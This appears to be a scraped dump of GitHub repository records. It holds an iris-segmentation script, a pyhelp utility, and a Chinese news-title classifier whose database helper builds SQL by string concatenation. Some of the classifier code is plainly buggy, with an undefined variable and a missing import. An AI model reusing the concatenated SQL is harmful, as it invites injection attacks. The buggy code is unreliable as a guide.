(cv.Round(center[0]), cv.Round(center[1]))\n size = (cv.Round(size[0] * 0.5), cv.Round(size[1] * 0.5))\n \n if iter == 1:\n if size[0] > size[1]:\n size2 = size[0]\n else:\n size2 = size[1]\n \n if size2 > size1:\n size1 = size2\n size3 = size \n\n # Fits ellipse to current contour.\n if eoc == 0 and iter == 2:\n rand_val = abs((lastr - ((size[0]+size[1])/2)))\n if rand_val > 20 and float(max(size[0],size[1]))/float(min(size[0],size[1])) < 1.5:\n lastcx = center[0]\n lastcy = center[1]\n lastr = (size[0]+size[1])/2\n \n if rand_val > 20 and float(max(size[0],size[1]))/float(min(size[0],size[1])) < 1.4:\n cv.Ellipse(cimg, center, size,\n angle, 0, 360,\n color,2, cv.CV_AA, 0)\n cv.Ellipse(source_image1, center, size,\n angle, 0, 360,\n color,2, cv.CV_AA, 0) \n \n elif eoc == 1 and iter == 2:\n (int,cntr,rad) = cv.MinEnclosingCircle(PointArray2D32f)\n cntr = (cv.Round(cntr[0]), cv.Round(cntr[1]))\n rad = (cv.Round(rad))\n if maxf == 0 and maxs == 0:\n cv.Circle(cimg, cntr, rad, color, 1, 
cv.CV_AA, shift=0)\n cv.Circle(source_image1, cntr, rad, color, 2, cv.CV_AA, shift=0)\n maxf = rad\n elif (maxf > 0 and maxs == 0) and abs(rad - maxf) > 30:\n cv.Circle(cimg, cntr, rad, color, 2, cv.CV_AA, shift=0)\n cv.Circle(source_image1, cntr, rad, color, 2, cv.CV_AA, shift=0)\n maxs = len(c) \n if iter == 1:\n temp3 = 2*abs(size3[1] - size3[0])\n if (temp3 > 40):\n eoc = 1\n\n\ndef rgb2gray(img):\n \"\"\"Convert a RGB image to gray scale.\"\"\"\n return 0.2989*img[:,:,0] + 0.587*img[:,:,1] + 0.114*img[:,:,2]\n\ndef circle_levelset(shape, center, sqradius, scalerow=1.0):\n \"\"\"Build a binary function with a circle as the 0.5-levelset.\"\"\"\n grid = np.mgrid[map(slice, shape)].T - center\n phi = sqradius - np.sqrt(np.sum((grid.T)**2, 0))\n u = np.float_(phi > 0)\n return u\n\ndef test_iris():\n global lvl_up,lvl_down,lvl_left,lvl_right\n # Load the image.\n img_lvl = imread(filename)/255.0\n \n # g(I)\n gI = morphsnakes.gborders(img_lvl, alpha=2200, sigma=5.48)\n \n # Morphological GAC. Initialization of the level-set.\n mgac = morphsnakes.MorphGAC(gI, smoothing=1, threshold=0.31, balloon=1)\n mgac.levelset = circle_levelset(img_lvl.shape, (cy, cx), (int(max_t/2) + 30))\n \n # Visual evolution.\n ppl.figure()\n ij = morphsnakes.evolve_visual(mgac, num_iters=120, background=img_lvl)\n #print ij.shape\n \n x_list = []\n y_list = []\n \n for i in range(w-1):\n for j in range(h-1):\n if ij[j][i] == 0:\n eyeball_bw[j][i] = (255,0,0)\n else:\n x_list.append(i)\n y_list.append(j)\n eyeball_bw[j][i] = (0,0,255)\n \n lvl_down = max(y_list)\n lvl_up = min(y_list)\n lvl_right = max(x_list)\n lvl_left = min(x_list)\n\ntest_iris()\n\ndef test_pupil():\n global p_up,p_down,p_left,p_right\n # Load the image.\n img_lvl = imread(filename)/255.0\n \n # g(I)\n gI = morphsnakes.gborders(img_lvl, alpha=2200, sigma=5.48)\n \n # Morphological GAC. 
Initialization of the level-set.\n mgac = morphsnakes.MorphGAC(gI, smoothing=1, threshold=0.31, balloon=1)\n mgac.levelset = circle_levelset(img_lvl.shape, (cy, cx), (max_t*0.3))\n \n # Visual evolution.\n ppl.figure()\n ij = morphsnakes.evolve_visual(mgac, num_iters=50, background=img_lvl)\n \n x_list = []\n y_list = []\n \n for i in range(w-1):\n for j in range(h-1):\n if ij[j][i] == 0:\n iris_bw[j][i] = (255,0,0)\n else:\n x_list.append(i)\n y_list.append(j)\n iris_bw[j][i] = (0,0,255)\n \n p_down = max(y_list)\n p_up = min(y_list)\n p_right = max(x_list)\n p_left = min(x_list)\n\ntest_pupil()\n \nif (p_left - lvl_left) > 1.3*(lvl_right - p_right):\n print 'Left WRONG'\n lvl_left = lvl_left + int((p_left - lvl_left)-(lvl_right - p_right))\nelif (lvl_right - p_right) > 1.3*(p_left - lvl_left):\n print 'Right WRONG'\n lvl_right = lvl_right - int((lvl_right - p_right)-(p_left - lvl_left)) \n\nif (p_right - p_left) > (p_down - p_up):\n ellipse_size = (p_right - p_left)\nelse:\n ellipse_size = (p_down - p_up)\n \nellipse_size = 2*ellipse_size\n\n# STage 3 - GrabCut\n\nmask = np.zeros(img.shape[:2],dtype = np.uint8) # mask initialized to PR_BG\noutput = np.zeros(img.shape,np.uint8) # output image to be shown\n\n# input and output windows\ncv2.namedWindow('output')\ncv2.namedWindow('input')\ncv2.moveWindow('input',img.shape[1]+10,90)\n\nrect_over = True\ncv2.rectangle(img,(lvl_left,lvl_down),(lvl_right,lvl_up),BLUE,2)\nrect = (min(lvl_left,lvl_right),min(lvl_up,lvl_down),abs(lvl_left-lvl_right),abs(lvl_up-lvl_down))\nrect_or_mask = 0\nbgdmodel = np.zeros((1,65),np.float64)\nfgdmodel = np.zeros((1,65),np.float64)\ncv2.grabCut(img2,mask,rect,bgdmodel,fgdmodel,1,cv2.GC_INIT_WITH_RECT)\nrect_or_mask = 1\n\ndiff = p_up - lvl_up\n\nm = p_left - 2\nn = p_up - 2\nwhile n > (p_up - 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m -= 1\n n -= 1\n\nm = p_right + 2\nn = p_up + 2\nwhile n > (p_up - 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m += 1\n n -= 1\n\n\ndiff = lvl_down - p_down\nm = p_left - 2\nn = p_down + 2\nwhile n < (p_down + 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m -= 1\n n += 1\n\nm = p_right + 2\nn = p_down + 2\nwhile n < (p_down + 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m += 1\n n += 1\n \ndiff = (p_left - lvl_left)/10\nm = p_left - diff\nwhile m > (lvl_left + diff):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m -= 1\n \ndiff = (lvl_right - p_right)/10\nm = p_right + diff\nwhile m < (lvl_right - diff):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m += 1\n\n\ndiff = p_right - p_left\nm = p_left + (diff/5)\nvalue = DRAW_BG\nwhile m < (p_left + 4*(diff/5)):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m += 1\n\ntempi = 0\n\nwhile tempi < 10:\n bgdmodel = np.zeros((1,65),np.float64)\n fgdmodel = np.zeros((1,65),np.float64)\n cv2.grabCut(img2,mask,rect,bgdmodel,fgdmodel,1,cv2.GC_INIT_WITH_MASK)\n tempi += 1\n \nmask2 = np.where((mask==1) + (mask==3),255,0).astype('uint8')\noutput = cv2.bitwise_and(img2,img2,mask=mask2)\n\nstrng = os.path.join(segF, os.path.basename(filename).split('.')[0] + 
'_seg.png')\ncv2.imwrite(strng,output)\n\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\n\ncv.NamedWindow(\"Result\", 1)\n\n# Stage 4 - Ellipse fitting\n\nfe = FitEllipse(source_image, (min_val+20))\n\ntab1 = cv2.imread(strng)\niter = 1\nflag_t = 0\n\nif (p_up - lvl_up) < (0.75*(lvl_down - p_down)):\n flag_t = 1\nelif (lvl_down - p_down) < (0.75*(p_up - lvl_up)):\n flag_t = 2\n \nif flag_t == 1:\n bnd = p_up - 10\n for i in range(w-1):\n for j in range(h-1):\n if j <= bnd and tab1[j][i][0] == 100:\n tab1[j][i] = (0,0,0)\n #if j <= bnd and tab2[j][i][0] == 255:\n #tab2[j][i] = (0,0,0)\nelif flag_t == 2:\n bnd = p_down + 10\n for i in range(w-1):\n for j in range(h-1):\n if j >= bnd and tab1[j][i][0] == 100:\n tab1[j][i] = (0,0,0)\n\ncv2.imwrite(strng,tab1)\n\nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nfe = FitEllipse(source_image, (min_val+20))\n\niter = 2\nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nfe = FitEllipse(source_image, (min_val+20))\n\n# Saving results\n\nstrng1 = os.path.join(segF, os.path.basename(filename).split('.')[0] + '_contour.png')\ncv.SaveImage(strng1,source_image1)\ncimg1 = cv2.imread(strng1)\nbar = np.zeros((img.shape[0],5,3),np.uint8)\nres = np.hstack((img2,bar,eyeball_bw,bar,iris_bw,bar,img,bar,output,bar,cimg1))\noutput_file = os.path.join(segF, os.path.basename(filename).split('.')[0] + '_grabcut_output.png')\ncv2.imwrite(output_file,res)\n\nprint 'Done segmenting!!!'\ncv2.destroyAllWindows()" } ]
1
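The iris pipeline in the record above seeds its morphological GAC with `circle_levelset`, which is Python 2 only: `np.mgrid[map(slice, shape)]` fails once `map()` became lazy, and `np.float_` is gone from NumPy 2.0. A self-contained sketch of the same helper ported under those assumptions (the shape, center, and radius values here are arbitrary test inputs, not from the record):

```python
import numpy as np

def circle_levelset(shape, center, sqradius):
    """Binary array whose 0.5-levelset is a circle, as in test_iris().

    map() is lazy on Python 3, so the slices are wrapped in a tuple
    before indexing np.mgrid, and the boolean mask is cast with
    astype() instead of the removed np.float_().
    """
    grid = np.mgrid[tuple(map(slice, shape))].T - center
    phi = sqradius - np.sqrt(np.sum(grid.T ** 2, axis=0))
    return (phi > 0).astype(float)

u = circle_levelset((240, 320), center=(120, 160), sqradius=40)
print(u.shape, int(u.sum()))  # (240, 320) and the pixel count inside the circle
```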
panos-kosmidis/Bash_Profiles
https://github.com/panos-kosmidis/Bash_Profiles
f6647642c496090f665eba9a2d239389f68b4745
61113a773c30053b67ad9a220d3ed2c02de39b9b
c27cd548347e3b9430486a304767e173c16200a8
refs/heads/master
2020-03-04T20:55:08.913508
2013-01-07T16:29:45
2013-01-07T16:31:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4958506226539612, "alphanum_fraction": 0.5, "avg_line_length": 24.3157901763916, "blob_id": "37e3e368b26f59b54f87fe1d658ba359097e0e00", "content_id": "24025e3b5a618026e98d57c386173e0e6560098c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/bin/pyhelp", "repo_name": "panos-kosmidis/Bash_Profiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\n\nwords = sys.argv; words.pop(0)\n\nfor word in words:\n try:\n help(word) # simplest case\n except NameError: # not a builtin or global\n try:\n try:\n __import__(word)\n except ImportError: # not a module...\n module, _ = word.rsplit('.', 1)\n __import__(module)\n\n help(word)\n except ImportError:\n print('Cannot find \"%s\" to import!' % word)\n\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 11, "blob_id": "d29d059a7a0bc28f3a754d88cf52384e19ca54ca", "content_id": "082a82d91767061221cba535ed9c3811bffd9c6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 36, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/bin/composer", "repo_name": "panos-kosmidis/Bash_Profiles", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n~/bin/composer.phar $@\n" } ]
2
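The `pyhelp` script in the record above retries `help()` after importing the parent module of a dotted name. A compact sketch of that resolution step built on `importlib` (the `resolve` helper is illustrative, not part of the repo):

```python
import importlib

def resolve(dotted):
    """Resolve 'pkg.mod.attr' to an object, importing as needed.

    Tries the longest importable module prefix, then walks any
    remaining parts with getattr, roughly the fallback pyhelp
    performs when its first help(word) call fails.
    """
    parts = dotted.split('.')
    for i in range(len(parts), 0, -1):
        try:
            obj = importlib.import_module('.'.join(parts[:i]))
        except ImportError:
            continue
        for attr in parts[i:]:
            obj = getattr(obj, attr)
        return obj
    raise ImportError('cannot resolve %r' % dotted)

help(resolve('os.path.join'))  # same output as `pyhelp os.path.join`
```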
ranmengyuan/TitleCategorization
https://github.com/ranmengyuan/TitleCategorization
b759a4ebad53d4b2a94ac80242750edcd359c54a
f4b38ae131b1696af82ea569a760fdd0380ea0e7
2d64be648b4664beaa5eb40f47d8b7635006ff70
refs/heads/master
2021-09-08T02:31:15.610362
2018-03-06T03:05:42
2018-03-06T03:05:42
123,883,054
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.850931704044342, "alphanum_fraction": 0.8612836599349976, "avg_line_length": 18.714284896850586, "blob_id": "d1c2365a308ff388d469c18f971a6f6bfea45d40", "content_id": "e295138dd0ece9e153c09b4f0c3802641f1dff80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1918, "license_type": "no_license", "max_line_length": 170, "num_lines": 49, "path": "/README.md", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "# TitleCategorization\n\nTitleCategorization是一款对新闻标题进行分类的工具。给定新闻标题x =(x1,x2,...,xn),其中xj表示x中的第j个字,对象是找出其可能的类别或标签c∈C。更具体地说,我们需要找出一个函数来预测x属于哪个类别。主要是通过TF-IDF对标题的关键词进行提取,然后通过朴素贝叶斯、SVM、Xgboost对文本进行分类。\n\n# 入门\n\nTitleCategorization包括analyze、bean、dataBase、file和main。\n\nfile主要是文件操作,对给定的已知数据进行读取,建立训练集。\n\nbean和dataBase主要是对数据库进行操作。\n\nanalyze主要是通过算法对数据进行预测。\n\nmain主要是对整个程序进行控制。\n\n# 文件结构\n\nbean和dataBase主要是对数据库进行操作。\n\nanalyze主要是通过算法对数据进行预测。\n\ncontrol.py主要是对整个程序进行控制。\n\nresult.text是正确的结果。\n\nresult1.text是用朴素贝叶斯分类算法后得到的结果。\n\nresult2.text是用SVM算法后得到的结果。\n\nresult3.text是用Xgboost算法后得到的结果。\n\nstatic.text是用朴素贝叶斯分类算法后得到的结果与正确结果各类标题数量的对比。\n\nstatic1.text是用Svm算法后得到的结果与正确结果各类标题数量的对比。\n\nstatic2.text是用Xgboost算法后得到的结果与正确结果各类标题数量的对比。\n\nresultdata是三个分类算法进行投票机制融合后的最终预测结果。\n\n# 支持平台\n\nTitleCategorization基于Python3.5。如果想要运行TitleCategorization推荐下载Python3.x解析器,并且需要pymysql,sklearn等包的支持。同时,需要注意处理文件和网页的格式。\n\n# 疑问\n\n如果您发现了诸如崩溃、意外行为或类似的问题,请访问[issue tracker](https://github.com/ranmengyuan/TitleCategorization/issues)方便交流。\n\n谢谢!\n" }, { "alpha_fraction": 0.5334288477897644, "alphanum_fraction": 0.5427889227867126, "avg_line_length": 28.410112380981445, "blob_id": "d7fed02f0b8a4bae6cbc2a1e60869e76f08539f8", "content_id": "f7b114d455447574bf992726157611bd97043a58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10752, "license_type": "no_license", "max_line_length": 117, "num_lines": 356, "path": "/control.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "# coding=utf-8\nimport jieba.posseg as pseg\nfrom dataBase.toDatabase import Headline, read_by_line, data_todatabase, create_data, get_element, create_result, \\\n result_todatabase, conn_db\nfrom Analyze.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.naive_bayes import MultinomialNB\nfrom tgrocery import Grocery\nimport xgboost as xgb\n# from sklearn.cross_validation import train_test_split\n\nimport numpy as np\n\nwordtype = []\nwordtype.append('n')\nwordtype.append('i')\nwordtype.append('l')\nwordtype.append('Ng')\nwordtype.append('nr')\nwordtype.append('ns')\nwordtype.append('nt')\nwordtype.append('nz')\nwordtype.append('v')\nwordtype.append('vg')\nwordtype.append('vd')\nwordtype.append('vn')\nwordtype.append('a')\nwordtype.append('ag')\nwordtype.append('ad')\nwordtype.append('an')\n\ntarget = []\ntarget.append(\"history\")\ntarget.append(\"military\")\ntarget.append(\"baby\")\ntarget.append(\"world\")\ntarget.append(\"tech\")\ntarget.append(\"game\")\ntarget.append(\"society\")\ntarget.append(\"sports\")\ntarget.append(\"travel\")\ntarget.append(\"car\")\ntarget.append(\"food\")\ntarget.append(\"entertainment\")\ntarget.append(\"finance\")\ntarget.append(\"fashion\")\ntarget.append(\"discovery\")\ntarget.append(\"story\")\ntarget.append(\"regimen\")\ntarget.append(\"essay\")\n\n\ndef get_stop():\n 
\"\"\"\n 获取停用词典\n :return:\n \"\"\"\n stopwords = {}\n fstop = open('//Volumes//Transcend//文件//实验室//标题分类//chinese_stopword.txt', 'r')\n for eachWord in fstop:\n stopwords[eachWord.strip()] = eachWord.strip()\n fstop.close()\n return stopwords\n\n\n#\n\ndef chang_result(word):\n \"\"\"\n 获得结果的序号\n :return:\n \"\"\"\n for i in range(len(target)):\n if word == target[i]:\n return i\n return -1\n\n\n# def get_data():\n# \"\"\"\n# 获取数据,整理后存入数据库\n# :return:\n# \"\"\"\n# stop = get_stop()\n# stopwords = {}.fromkeys(stop)\n# x_train = []\n# y_train = []\n# x_test = []\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//train.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = temp_data[1].split(\" \")\n# j = 0\n# x = []\n# y = []\n# index = chang_result(temp_data[0])\n# y_train.append(index)\n# while 1:\n# if j >= len(temp):\n# break\n# if temp[j] not in stopwords:\n# x.append(temp[j])\n# j += 1\n# x_train.append(x)\n#\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//test//test.word\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp = content[0].split(\" \")\n# j = 0\n# x = []\n# while 1:\n# if j >= len(temp):\n# break\n# if temp[j] not in stopwords:\n# x.append(temp[j])\n# j += 1\n# x_test.append(x)\n# return x_train, y_train, x_test\n\n\ndef get_data():\n \"\"\"\n 获取数据,整理后存入数据库\n :return:\n \"\"\"\n stop = get_stop()\n stopwords = {}.fromkeys(stop)\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n test = []\n file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//train.txt\")\n # conn, cur = create_data(\"Train\")\n for i in range(len(file_content)):\n content = file_content[i].split(\"\\n\")\n temp_data = content[0].split(\"\\t\")\n temp = temp_data[1].split(\" \")\n j = 0\n x = []\n y = []\n index = chang_result(temp_data[0])\n y_train.append(index)\n while 1:\n if j >= len(temp):\n break\n if temp[j] not in stopwords:\n # data = Headline()\n # data.result = temp_data[0]\n # data.content = temp[j]\n # data.sentence_id = i + 1\n # data_todatabase(conn, cur, data, \"Train\")\n x.append(temp[j])\n j += 1\n x_train.append(x)\n # y_train.append(y)\n\n # conn, cur = create_data(\"Test\")\n file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//dev.txt\")\n for i in range(len(file_content)):\n content = file_content[i].split(\"\\n\")\n temp_data = content[0].split(\"\\t\")\n temp = temp_data[1].split(\" \")\n j = 0\n x = []\n y = []\n index = chang_result(temp_data[0])\n y_test.append(index)\n t = ''\n while 1:\n if j >= len(temp):\n break\n t += temp[j]\n if temp[j] not in stopwords:\n # data = Headline()\n # data.result = temp_data[0]\n # data.content = temp[j]\n # data.sentence_id = i + 1\n # data_todatabase(conn, cur, data, \"Test\")\n x.append(temp[j])\n j += 1\n x_test.append(x)\n test.append(t)\n # y_test.append(y)\n return x_train, y_train, x_test, y_test, test\n\n\n# def get_data():\n# \"\"\"\n# 获取数据,并整理\n# :return:\n# \"\"\"\n# stopwords = get_stop()\n# x_train = []\n# y_train = []\n# x_test = []\n# y_test = []\n# test = []\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//sentence//train.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = pseg.cut(temp_data[1])\n# x = []\n# y_train.append(temp_data[0])\n# for w in 
temp:\n# if (w.word not in stopwords) & (w.flag in wordtype):\n# x.append(w.word)\n# x_train.append(x)\n#\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//sentence//test.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = pseg.cut(temp_data[1])\n# x = []\n# y_test.append(temp_data[0])\n# for w in temp:\n# if (w.word not in stopwords) & (w.flag in wordtype):\n# x.append(w.word)\n# x_test.append(x)\n# test.append(temp_data[1])\n# return x_train, y_train, x_test, y_test, test\n\n\ndef analyze_data():\n \"\"\"\n 分析数据,获得每个元素的概率\n :return:\n \"\"\"\n # conn, cur = create_result(\"Rate\")\n conn = conn_db()\n cur = conn.cursor()\n i = 89\n while 1:\n element = get_element(cur, i)\n if len(element) == 0:\n break\n for j in range(len(element)):\n print(element[j])\n sum, count = MultinomialNB(element[j], target)\n if sum == 0:\n for n in range(18):\n rate.append(0)\n else:\n rate = []\n for k in range(len(count)):\n temp = count[k] / sum\n rate.append(temp)\n result_todatabase(conn, cur, element[j], i, rate, \"Rate\")\n\n i += 1\n\n\nif __name__ == \"__main__\":\n target = []\n target.append(\"history\")\n target.append(\"military\")\n target.append(\"baby\")\n target.append(\"world\")\n target.append(\"tech\")\n target.append(\"game\")\n target.append(\"society\")\n target.append(\"sports\")\n target.append(\"travel\")\n target.append(\"car\")\n target.append(\"food\")\n target.append(\"entertainment\")\n target.append(\"finance\")\n target.append(\"fashion\")\n target.append(\"discovery\")\n target.append(\"story\")\n target.append(\"regimen\")\n target.append(\"essay\")\n\n # get_data()\n # analyze_data()\n\n x_train, y_train, x_test, y_test, test = get_data()\n print(len(x_train))\n # x_train, x_valid, y_train, y_valid = train_test_split(x_train, y_train, test_size=0.9, random_state=4242)\n # print(len(x_train))\n\n count_vec = TfidfVectorizer(binary=False, decode_error='ignore', stop_words='english', tokenizer=lambda doc: doc,\n lowercase=False)\n x_train = count_vec.fit_transform(x_train)\n train = x_train.toarray()\n x_test = count_vec.transform(x_test)\n test = x_test.toarray()\n\n # clf = MultinomialNB(alpha=0.1).fit(x_train, y_train)\n # doc_class_predicted = clf.predict(x_test)\n # f = open('resultdata.text', 'a')\n # for i in range(len(doc_class_predicted)):\n # index = int(doc_class_predicted[i])\n # f.write(target[index] + \"\\n\")\n\n # dtrain = xgb.DMatrix(train, label=y_train)\n # dtest = xgb.DMatrix(test)\n # # param = {'max_depth': 6, 'eta': 0.5, 'eval_metric': 'merror', 'silent': 1, 'objective': 'multi:softmax',\n # # 'num_class': 3} # 参数\n # # param = {'learning_rate': 0.1, 'n_estimators': 1000, 'max_depth': 3, 'nthread': 4, 'min_child_weight': 5,\n # # 'gamma': 0, 'subsample': 1.0, 'colsample_bytree': 0.8, 'scale_pos_weight': 1, 'eta': 0.05,\n # # 'silent': 1, 'objective': 'binary:logistic'}\n # param = {'learning_rate': 0.1, 'max_depth': 3, 'eta': 0.05, 'eval_metric': 'merror',\n # 'silent': 1, 'objective': 'multi:softmax', 'num_class': 18} # 参数\n #\n # evallist = [(dtrain, 'train')] # 这步可以不要,用于测试效果\n # num_round = 50 # 循环次数\n # plst = param.items()\n # bst = xgb.train(plst, dtrain, num_round, evallist)\n # preds = bst.predict(dtest)\n # print(np.mean(preds == y_test))\n # for value in preds:\n # print(value)\n\n\n grocery = tgrocery.Grocery('sample')\n grocery.train(train, label=y_train)\n grocery.save()\n grocery.load()\n preds = grocery.predict(x_test)\n 
print(preds)\n\n\n\n# i = 0\n# f = open('result3.text', 'a')\n# result = []\n# for pre in doc_class_predicted:\n# result.append(pre)\n# f.write(test[i] + \"\\t\" + pre + \"\\n\")\n# i += 1\n# for i in range(len(target)):\n# n = result.count(target[i])\n# n1 = y_test.count(target[i])\n# print(target[i] + \"\\t\" + str(n) + \"\\t\" + str(n1))\n\n\n# precision, recall, thresholds = precision_recall_curve(y_test, doc_class_predicted)\n# answer = clf.predict_proba(x_test)[:, 1]\n# report = answer > 0.5\n# print(classification_report(y_test, report, target_names=['neg', 'pos']))\n\n# x = np.load(\"a.npy\")\n# y = np.load(\"b.npy\")\n# y_train = y.ravel()\n# y = np.array(y_train).astype(int)\n# clf = MultinomialNB(alpha=0.1)\n# clf.fit(x, y)\n# pred = clf.predict([x[0]])\n# print(pred)\n" }, { "alpha_fraction": 0.6112852692604065, "alphanum_fraction": 0.6112852692604065, "avg_line_length": 20.266666412353516, "blob_id": "ae6274fe9a6442b94bcfe5f190667ebfcd131733", "content_id": "44761096a04bd095b882527a5a01cf5d9daa6d27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/Analyze/naive_bayes.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "from dataBase.toDatabase import conn_db, get_count, get_sum\n\n\ndef MultinomialNB(data, target):\n \"\"\"\n 每个样本确定每个标签集的正确预测。\n :param data:\n :param target:\n :return:\n \"\"\"\n conn = conn_db()\n cur = conn.cursor()\n sum = get_sum(cur, data)\n count = get_count(cur, data, target)\n return sum, count\n" }, { "alpha_fraction": 0.4681059718132019, "alphanum_fraction": 0.4779195189476013, "avg_line_length": 27.62359619140625, "blob_id": "ef00f8c800582548fd396635eb04a9c7199481a8", "content_id": "37a399aa674ab84408430a544340872de6978007", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5283, "license_type": "no_license", "max_line_length": 131, "num_lines": 178, "path": "/dataBase/toDatabase.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "from dataBase.sql_helper import conn_db, conn_close, exe_query, exe_table, exe_update\n\n\nclass Headline:\n content = ''\n sentence_id = 0\n result = ''\n\n def __init__(self):\n self.content = ''\n self.sentence_id = 0\n self.result = ''\n\n\ndef read_by_line(address):\n \"\"\"\n 带缓存的文件读取一行数据\n :param address:\n :return:\n \"\"\"\n file = open(address)\n file_content = []\n while 1:\n lines = file.readlines(10000)\n if not lines:\n break\n for line in lines:\n file_content.append(line)\n return file_content\n\n\ndef create_data(form):\n \"\"\"\n 建立数据库表格\n :param form:\n :return:\n \"\"\"\n try:\n conn = conn_db()\n cur = conn.cursor()\n sql = \"DROP TABLE if EXISTS \" + form\n exe_table(cur, sql)\n sql = \"CREATE TABLE \" + form + \"(id INT NOT NULL AUTO_INCREMENT,content VARCHAR (255),sentence_id INT ,\" \\\n \"result VARCHAR(255) ,PRIMARY KEY (id)) ENGINE = InnoDB DEFAULT CHARSET = UTF8\"\n exe_table(cur, sql)\n\n except Exception as e:\n print(e)\n finally:\n return conn, cur\n\n\ndef data_todatabase(conn, cur, data, form):\n \"\"\"\n 将文本文件处理并存入数据库中\n :param file_content:\n :return:\n \"\"\"\n try:\n sql = \"INSERT INTO \" + form + \"(content,sentence_id,result) VALUES ('\" + data.content + \"','\" + str(\n data.sentence_id) + \"','\" + data.result + \"')\"\n print(form + \"\\t\" + data.content)\n exe_table(cur, sql)\n except Exception as e:\n 
print(e)\n\n\ndef create_result(form):\n \"\"\"\n 建立数据库表格\n :param form:\n :return:\n \"\"\"\n try:\n conn = conn_db()\n cur = conn.cursor()\n sql = \"DROP TABLE if EXISTS \" + form\n exe_table(cur, sql)\n sql = \"CREATE TABLE \" + form + \"(id INT NOT NULL AUTO_INCREMENT,content VARCHAR (255),sentence_id INT ,\" \\\n \"history float ,military float ,baby float ,world float ,tech float ,game float \" \\\n \",society float ,sports float ,travel float ,car float ,food float ,entertainment float \" \\\n \",finance float ,fashion float ,discovery float ,story float ,regimen float ,essay float \" \\\n \",PRIMARY KEY (id)) ENGINE = InnoDB DEFAULT CHARSET = UTF8\"\n exe_table(cur, sql)\n\n except Exception as e:\n print(e)\n finally:\n return conn, cur\n\n\ndef result_todatabase(conn, cur, content, sentence, rate, form):\n \"\"\"\n 将文本文件处理并存入数据库中\n :param file_content:\n :return:\n \"\"\"\n try:\n sql = \"INSERT INTO \" + form + \"(content,sentence_id,history ,military ,baby ,world ,tech ,game \" \\\n \",society ,sports ,travel ,car ,food ,entertainment \" \\\n \",finance ,fashion ,discovery ,story ,regimen ,essay) VALUES ('\" + content + \\\n \"','\" + str(sentence) + \"','\" + str(rate[0]) + \"','\" + str(rate[1]) + \"','\" + str(rate[2]) + \"','\" + str(\n rate[3]) + \"','\" \\\n + str(rate[4]) + \"','\" + str(rate[5]) + \"','\" + str(rate[6]) + \"','\" + str(rate[7]) + \"','\" + str(\n rate[8]) + \"','\" + str(rate[9]) + \\\n \"','\" + str(rate[10]) + \"','\" + str(rate[11]) + \"','\" + str(rate[12]) + \"','\" + str(\n rate[13]) + \"','\" + str(rate[14]) + \"',\" \\\n \"'\" + str(rate[\n 15]) + \"','\" + str(rate[16]) + \"','\" + str(\n rate[17]) + \"')\"\n 